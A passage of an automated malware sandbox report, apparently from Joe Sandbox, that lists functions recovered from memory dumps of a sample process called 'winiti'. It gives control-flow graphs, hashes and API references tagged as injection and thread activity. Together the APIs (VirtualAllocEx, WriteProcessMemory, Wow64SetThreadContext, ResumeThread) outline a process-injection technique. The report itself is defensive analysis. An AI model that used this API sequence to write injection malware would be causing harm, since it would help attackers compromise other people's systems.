                          Function 00BD3AE8 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1093 bd3ae8-bd3b81 1095 bd3bca-bd3bf2 1093->1095 1096 bd3b83-bd3b9a 1093->1096 1100 bd3c38-bd3c8e 1095->1100 1101 bd3bf4-bd3c08 1095->1101 1096->1095 1099 bd3b9c-bd3ba1 1096->1099 1102 bd3bc4-bd3bc7 1099->1102 1103 bd3ba3-bd3bad 1099->1103 1110 bd3cd4-bd3dcb CreateProcessA 1100->1110 1111 bd3c90-bd3ca4 1100->1111 1101->1100 1108 bd3c0a-bd3c0f 1101->1108 1102->1095 1105 bd3baf 1103->1105 1106 bd3bb1-bd3bc0 1103->1106 1105->1106 1106->1106 1109 bd3bc2 1106->1109 1112 bd3c11-bd3c1b 1108->1112 1113 bd3c32-bd3c35 1108->1113 1109->1102 1129 bd3dcd-bd3dd3 1110->1129 1130 bd3dd4-bd3eb9 1110->1130 1111->1110 1119 bd3ca6-bd3cab 1111->1119 1114 bd3c1d 1112->1114 1115 bd3c1f-bd3c2e 1112->1115 1113->1100 1114->1115 1115->1115 1118 bd3c30 1115->1118 1118->1113 1121 bd3cad-bd3cb7 1119->1121 1122 bd3cce-bd3cd1 1119->1122 1123 bd3cb9 1121->1123 1124 bd3cbb-bd3cca 1121->1124 1122->1110 1123->1124 1124->1124 1125 bd3ccc 1124->1125 1125->1122 1129->1130 1142 bd3ec9-bd3ecd 1130->1142 1143 bd3ebb-bd3ebf 1130->1143 1145 bd3edd-bd3ee1 1142->1145 1146 bd3ecf-bd3ed3 1142->1146 1143->1142 1144 bd3ec1 1143->1144 1144->1142 1148 bd3ef1-bd3ef5 1145->1148 1149 bd3ee3-bd3ee7 1145->1149 1146->1145 1147 bd3ed5 1146->1147 1147->1145 1150 bd3f2b-bd3f36 1148->1150 1151 bd3ef7-bd3f20 1148->1151 1149->1148 1152 bd3ee9 1149->1152 1156 bd3f37 1150->1156 1151->1150 1152->1148 1156->1156
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BD3DAF
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: e0c47e203284fd9c82bd5285cd82ac29372f830397351ac3e3d0b6e258651c2b
                          • Instruction ID: 2f7f7da8ea82fb3c8d4391ea83de22f31c8d9e7fb095b2c0b0d0e7a800e1183e
                          • Opcode Fuzzy Hash: e0c47e203284fd9c82bd5285cd82ac29372f830397351ac3e3d0b6e258651c2b
                          • Instruction Fuzzy Hash: 71C10471D002198FDB25CFA8C841BEEBBF1FB09300F0495AAD819B7251EB749A85CF95
                          Function 00BD3748 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1157 bd3748-bd37bb 1159 bd37bd-bd37cf 1157->1159 1160 bd37d2-bd3839 WriteProcessMemory 1157->1160 1159->1160 1162 bd383b-bd3841 1160->1162 1163 bd3842-bd3894 1160->1163 1162->1163
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00BD3823
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: e49de722e56c516e3bb4fadaddf75eba5341713275ad6e900dc569b89a3be740
                          • Instruction ID: c2698ce07ae33832cae355aedd734cc5b6c5412e899b9ec3011f74736ef809c0
                          • Opcode Fuzzy Hash: e49de722e56c516e3bb4fadaddf75eba5341713275ad6e900dc569b89a3be740
                          • Instruction Fuzzy Hash: 4041A9B9D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D335AA45CF64
                          Function 00BD3750 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1168 bd3750-bd37bb 1170 bd37bd-bd37cf 1168->1170 1171 bd37d2-bd3839 WriteProcessMemory 1168->1171 1170->1171 1173 bd383b-bd3841 1171->1173 1174 bd3842-bd3894 1171->1174 1173->1174
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00BD3823
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: e7e7747b0536a60afe9b4caed47ece61e955f11b00d4c31be897b98ff30b5c6e
                          • Instruction ID: 935211ada51e8cb83640ebb1c23c0e0db35b208edaa5cb66e1e7eeab771ca97b
                          • Opcode Fuzzy Hash: e7e7747b0536a60afe9b4caed47ece61e955f11b00d4c31be897b98ff30b5c6e
                          • Instruction Fuzzy Hash: 5C41A8B5D012489FCF00CFA9D984AEEFBF1BB49314F20942AE818B7210D335AA45CF64
                          Function 00BD38AA Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1179 bd38aa-bd3978 ReadProcessMemory 1182 bd397a-bd3980 1179->1182 1183 bd3981-bd39d3 1179->1183 1182->1183
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00BD3962
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 308d4e90e842811f2d1598558b216e34e912a08d5052a94fff49b855fdb7e6a5
                          • Instruction ID: f4a071ab277a186d2de2789929522d797d5ac427111e0bca46335c3711b05b7b
                          • Opcode Fuzzy Hash: 308d4e90e842811f2d1598558b216e34e912a08d5052a94fff49b855fdb7e6a5
                          • Instruction Fuzzy Hash: 1A41AAB5D042589FCF10CFA9D984AEEFBB1BB49314F20942AE815B7200D374A945CF65
                          Function 00BD38B0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1188 bd38b0-bd3978 ReadProcessMemory 1191 bd397a-bd3980 1188->1191 1192 bd3981-bd39d3 1188->1192 1191->1192
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00BD3962
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 2de8d2a4aeae67d3be9120520a694d7acd828cbf381b7231da367f6f3c02589d
                          • Instruction ID: 0f1523d8e2e7eee6d6ad2b0387f9abb6fd622225c05cca06c6d0208e53b0219e
                          • Opcode Fuzzy Hash: 2de8d2a4aeae67d3be9120520a694d7acd828cbf381b7231da367f6f3c02589d
                          • Instruction Fuzzy Hash: 824199B5D002589FCF10CFA9D984AEEFBB1BB49310F10942AE815B7300D779AA45CF65
                          Function 00BD3622 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1197 bd3622-bd36e8 VirtualAllocEx 1200 bd36ea-bd36f0 1197->1200 1201 bd36f1-bd373b 1197->1201 1200->1201
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00BD36D2
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 5e269676f89fd63c9a2b9c298993c23b74b67c7f0b28fe665b6cada1be8f96ca
                          • Instruction ID: 56a4269cce4d5b6b5ce9d24fa47ba30a6e38c06f9924b4ad6bae27b71596da30
                          • Opcode Fuzzy Hash: 5e269676f89fd63c9a2b9c298993c23b74b67c7f0b28fe665b6cada1be8f96ca
                          • Instruction Fuzzy Hash: 6E41AAB9D042589FCF10CFA9D980AEEFBB1AB49314F10942AE815B7310D735A905CF55
                          Function 00BD3628 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1206 bd3628-bd36e8 VirtualAllocEx 1209 bd36ea-bd36f0 1206->1209 1210 bd36f1-bd373b 1206->1210 1209->1210
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00BD36D2
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: fd85b3f0ddf9ffda95d5b5d19df342f5142d79025b70a4952c4381496631cded
                          • Instruction ID: 8d4cc996a2b4a4b02cf6c933739d1167ae24f4677f0388c100057c59803c951a
                          • Opcode Fuzzy Hash: fd85b3f0ddf9ffda95d5b5d19df342f5142d79025b70a4952c4381496631cded
                          • Instruction Fuzzy Hash: 154199B9D002589BCF10CFA9D984AEEFBB5AB49310F10942AE814B7310D735A945CF65
                          Function 00BD34F2 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1215 bd34f2-bd3558 1217 bd356f-bd35bd Wow64SetThreadContext 1215->1217 1218 bd355a-bd356c 1215->1218 1220 bd35bf-bd35c5 1217->1220 1221 bd35c6-bd3612 1217->1221 1218->1217 1220->1221
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00BD35A7
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 0cf4fe46b093b1c8dd4eadbc6046aa2447e84d105abffa1760ff41a0a0a0ada7
                          • Instruction ID: b52e33c74a0fa0cc2ca16a9744dba276dcdbf233dc44bbe3fe8971910139fcf2
                          • Opcode Fuzzy Hash: 0cf4fe46b093b1c8dd4eadbc6046aa2447e84d105abffa1760ff41a0a0a0ada7
                          • Instruction Fuzzy Hash: AF41BBB5D012589FCB10CFA9D984AEEFBF1AB49314F24842AE415B7240D738AA49CF54
                          Function 00BD34F8 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00BD35A7
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 008fc870e6066abc7ffb44f09ea910ce94e181ca2bd076fdae19cc8485467db7
                          • Instruction ID: 5d15afe68753720a49be6402fcebaebc32275e0f3dbc3ae8816ec120bdda7b2d
                          • Opcode Fuzzy Hash: 008fc870e6066abc7ffb44f09ea910ce94e181ca2bd076fdae19cc8485467db7
                          • Instruction Fuzzy Hash: C741ACB5D002589FCB10CFAAD984AEEFBF1AB49314F24842AE414B7344D738AA45CF54
                          Function 00BD3400 Relevance: 1.6, APIs: 1, Instructions: 78threadCOMMON
                          Download Yara Rule
                          APIs
                          • ResumeThread.KERNELBASE(?), ref: 00BD3486
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: fce1169b37cca229b1194169cc9e8462288636b64736d83ec34ff20f3c89f635
                          • Instruction ID: 2074051041bd8eeaf4ede3d142ed713e42d038e11a74db0b86c5e879ed26f5b9
                          • Opcode Fuzzy Hash: fce1169b37cca229b1194169cc9e8462288636b64736d83ec34ff20f3c89f635
                          • Instruction Fuzzy Hash: 7831CAB5D002589FCF10CFA9E984AEEFBF1AB49314F24846AE815B7300D735A905CF94
                          Function 00BD3408 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                          Download Yara Rule
                          APIs
                          • ResumeThread.KERNELBASE(?), ref: 00BD3486
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 3557afe22f6f5836d2341ad9f9e9044a5e12d3b74454eb0c58f01e35791499d0
                          • Instruction ID: aab76e9eefe68700dc9621b802fd84cf40ad0a7e477bbbc93613d39c47391619
                          • Opcode Fuzzy Hash: 3557afe22f6f5836d2341ad9f9e9044a5e12d3b74454eb0c58f01e35791499d0
                          • Instruction Fuzzy Hash: 1731BAB4D002189FCF14CFAAD984AAEFBF5AF49314F24946AE814B7300D735A905CFA5
                          Function 002CF4F8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: r
                          • API String ID: 0-1812594589
                          • Opcode ID: 4458b2fc8608eaf94cc3df6bb22677ba31576bc34621171654616c2528d26e89
                          • Instruction ID: 5ace808b0484db649847d958326d79bc958ee74fa7df31cb0b1168a7a5fe3780
                          • Opcode Fuzzy Hash: 4458b2fc8608eaf94cc3df6bb22677ba31576bc34621171654616c2528d26e89
                          • Instruction Fuzzy Hash: 95512770D28108DBCB84CFA9D644AEDFBBAFF8D341F60D26AD41AA2221C7749955CF50
                          Function 002C3299 Relevance: .2, Instructions: 214COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6cfb1f38ee2888ab2af0032ad89fd3c2d8f320ee7c6f4794d85e7ee2dbe1ecba
                          • Instruction ID: e85cba4afab4a3e281e428b6ac3a24e9c9714c23ad2abd8e6622947cb826c62e
                          • Opcode Fuzzy Hash: 6cfb1f38ee2888ab2af0032ad89fd3c2d8f320ee7c6f4794d85e7ee2dbe1ecba
                          • Instruction Fuzzy Hash: 4E811E302047048FC745AB78D8987AEBBF2FFC9300F548969E41E9B355DF34A9868B91
                          Function 002C32A8 Relevance: .2, Instructions: 207COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 41df5bc1419b583fdf8bba691ae12d69d214b49d5f30236c17cfedc5491d955c
                          • Instruction ID: 69e5be6c58ba910f711431aec11a2171e0ca261c1e9034b475a5b7f7f7cdfa89
                          • Opcode Fuzzy Hash: 41df5bc1419b583fdf8bba691ae12d69d214b49d5f30236c17cfedc5491d955c
                          • Instruction Fuzzy Hash: 09810C702047048FC745AB78D4987AEB7F6EFC9300F548968E41E9B355EF34A9868B91
                          Function 002C8C80 Relevance: .2, Instructions: 150COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 19ac1f37b8e6017ad4be7fad70e524d713c1ed264373ecbb33ca7d7440f260af
                          • Instruction ID: a40090793b532b4d81a06b41f8dbc11cdbb3c5241e5713e8b10835f749cc2005
                          • Opcode Fuzzy Hash: 19ac1f37b8e6017ad4be7fad70e524d713c1ed264373ecbb33ca7d7440f260af
                          • Instruction Fuzzy Hash: AB511774D69119DFCB00CFA8D580EFDBBB8BB1D340F20966AD816E7355DBB098219B60
                          Function 002C8C88 Relevance: .1, Instructions: 148COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b7b3a553d0dd6e3cc491257646564cd9809fe729797c5adda16a177dc904534d
                          • Instruction ID: 162bc31eff385757f256c64b52aa3b457cee1247f512029e017a19832da2cba7
                          • Opcode Fuzzy Hash: b7b3a553d0dd6e3cc491257646564cd9809fe729797c5adda16a177dc904534d
                          • Instruction Fuzzy Hash: EE511974D69119DFCB00CFA8D580EFDBBB8BB1D340F20965AD816A7355DBB098219B60
                          Function 002C9801 Relevance: .1, Instructions: 131COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5ad6a58acbfe54f48d18ffd9e26245a2337013865efbe54d7c95683a95fa610d
                          • Instruction ID: 45d6fe31885b78b4eb5a1ea07dbc2c6c10f191feddeb5c3e63415e79276f8e57
                          • Opcode Fuzzy Hash: 5ad6a58acbfe54f48d18ffd9e26245a2337013865efbe54d7c95683a95fa610d
                          • Instruction Fuzzy Hash: B7410574D6A218DFCF14CFA5C988AECBBB5FF4A310F206219E40AA7251C7749995DB00
                          Function 002C8B44 Relevance: .1, Instructions: 116COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f56f3d0b0e97fd8c322ed6c59ad85afd764ccb53654f04d792cd5dc1a5c0bb8e
                          • Instruction ID: 2adfd5343b27ca0f21f8dc6b19141a360ece9e402b1318133e419de0d48cdcbb
                          • Opcode Fuzzy Hash: f56f3d0b0e97fd8c322ed6c59ad85afd764ccb53654f04d792cd5dc1a5c0bb8e
                          • Instruction Fuzzy Hash: E8415EB4D29618CFC708CF5AD984EBDBBF8BF4D304B11D599D0199B226DB709921DB00
                          Function 002C8B48 Relevance: .1, Instructions: 114COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2deed2aa32858998fec4e937aef56ab1e7381cdb7258b7abac4180448742ece9
                          • Instruction ID: 97d982e0901219cbf4bc900f77b908f696c86ec4cae7d0c0d0d95ace49b79f4a
                          • Opcode Fuzzy Hash: 2deed2aa32858998fec4e937aef56ab1e7381cdb7258b7abac4180448742ece9
                          • Instruction Fuzzy Hash: 9F415EB4D29518CFC708CF5AD984EBDB7F8BF4D304B11D699C0199B226DB709921DB00
                          Function 002CAB70 Relevance: .1, Instructions: 105COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d82bb5ef2685e5bf0905cc7f0e63998be76fb071f3bb7d9cf2635d3c9843b0e
                          • Instruction ID: 6db9869543c4a00c87cfc276ba20fa098202f8a9849c9205ec6014c957e54f08
                          • Opcode Fuzzy Hash: 2d82bb5ef2685e5bf0905cc7f0e63998be76fb071f3bb7d9cf2635d3c9843b0e
                          • Instruction Fuzzy Hash: FF41AF30A001189FDB45EBA4DC45BBF7BB6FB88314F108069E515A7348DB349E12CBA1
                          Function 002CAB80 Relevance: .1, Instructions: 98COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e6d9864ad0b4b5aba78ee4a0e96fbb0f34dd07e0a992cc9b7caff8f3c9f4d857
                          • Instruction ID: 243bd6098b3f29feebe1bd19353b38d5427be1d476a86709f6ef57c0d36497d5
                          • Opcode Fuzzy Hash: e6d9864ad0b4b5aba78ee4a0e96fbb0f34dd07e0a992cc9b7caff8f3c9f4d857
                          • Instruction Fuzzy Hash: 2A316E31A001199FDB45EBA8DD45BBFBBB7FB88314F108069E519A7348DB309E11CBA1
                          Function 0017D1D4 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414571365.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_17d000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: beb76c4d60702b41a609ea54fc4035f76556518fbf36b79c98eb8887dfabdd98
                          • Instruction ID: 46e9946be57261d5209dbc6b84a9c910d9bf55ea884654932b9c3cc7d8bb4c1b
                          • Opcode Fuzzy Hash: beb76c4d60702b41a609ea54fc4035f76556518fbf36b79c98eb8887dfabdd98
                          • Instruction Fuzzy Hash: 3521B0B5604248AFDB15DF14E9C0B26BBB5EF84314F24C5A9E8494B256C336D847CB61
                          Function 0017D01C Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414571365.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_17d000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 659ad353138d2fc52e4a4cdc4f3cdf7cedde829496efcee78784a3866059a938
                          • Instruction ID: d164b459a808e4dc30d8f9d11a3c02c5438a412f86134e511d9242d1057f6da0
                          • Opcode Fuzzy Hash: 659ad353138d2fc52e4a4cdc4f3cdf7cedde829496efcee78784a3866059a938
                          • Instruction Fuzzy Hash: B321D075604248EFDB15CF14E884B26BB71EF84314F34C5A9E84D4B246C336D847CBA1
                          Function 002CB2D8 Relevance: .1, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 35e88046ecd65967b0e7a698bf5e68f6e8ed255fdcb2233c5cff48a1195bce41
                          • Instruction ID: f4109e25db5bb12bf6111a159ecbb11cb3f0f64777116abd880635e3efb8c06a
                          • Opcode Fuzzy Hash: 35e88046ecd65967b0e7a698bf5e68f6e8ed255fdcb2233c5cff48a1195bce41
                          • Instruction Fuzzy Hash: E321A530609284DFC706EF68D816B5D7BB69F86300F15C1EAD5099B2A6DB359D05CB42
                          Function 0017D006 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414571365.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_17d000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 565f75d38e4f7350f063d62ce24505424e1b395d29b5c826c31e1f917094453a
                          • Instruction ID: ce486fcf9abe6ec95ceb8dbf38f3db559b2253b8cea6385595494ee791a13ebc
                          • Opcode Fuzzy Hash: 565f75d38e4f7350f063d62ce24505424e1b395d29b5c826c31e1f917094453a
                          • Instruction Fuzzy Hash: 92218B755093848FDB12CF24D994B15BF71EF46314F28C5EAD8498F2A7C33A984ACB62
                          Function 002CE588 Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 908929226a8314954abc64af03a6b43995583a75ae57e06a5b7334cea9b616bd
                          • Instruction ID: 56722fcda36d2d02bc82cc7629963e3dc08070eccaf1c025b09ca955381b8c7d
                          • Opcode Fuzzy Hash: 908929226a8314954abc64af03a6b43995583a75ae57e06a5b7334cea9b616bd
                          • Instruction Fuzzy Hash: EB212CB4E24109DFCB40DF99C580AAEBBF9FB48344F619159D809A7311D770AE41CF91
                          Function 002CB2B0 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 791c9ddd463b89614e7c47df38871d0991ab18b270f225e75b7fc17bcbf1ef40
                          • Instruction ID: eb262643827b5382dcbdbbe7bca86f2f7aa7d18a66e390b1918f7c3c535e2265
                          • Opcode Fuzzy Hash: 791c9ddd463b89614e7c47df38871d0991ab18b270f225e75b7fc17bcbf1ef40
                          • Instruction Fuzzy Hash: BE11A0306497C08FC317AB248816B697F72AF82300F19C1EBD5158F2A7CB299C0AC742
                          Function 002C93C2 Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2f846154fa5f272c52c1a048348c88e2c0c7bf6a01df6dd8b7d9b16d3dd31051
                          • Instruction ID: a4ec9bc31c6dc6254142e1a306867d2c56b53062406eadb0fe9ede2bcd469fc2
                          • Opcode Fuzzy Hash: 2f846154fa5f272c52c1a048348c88e2c0c7bf6a01df6dd8b7d9b16d3dd31051
                          • Instruction Fuzzy Hash: 6E110674D18248CBDB08CF65C408BBDBBB9AF8A300F14D2AEC4291B292DB704546CB81
                          Function 0017D1CF Relevance: .1, Instructions: 53COMMON
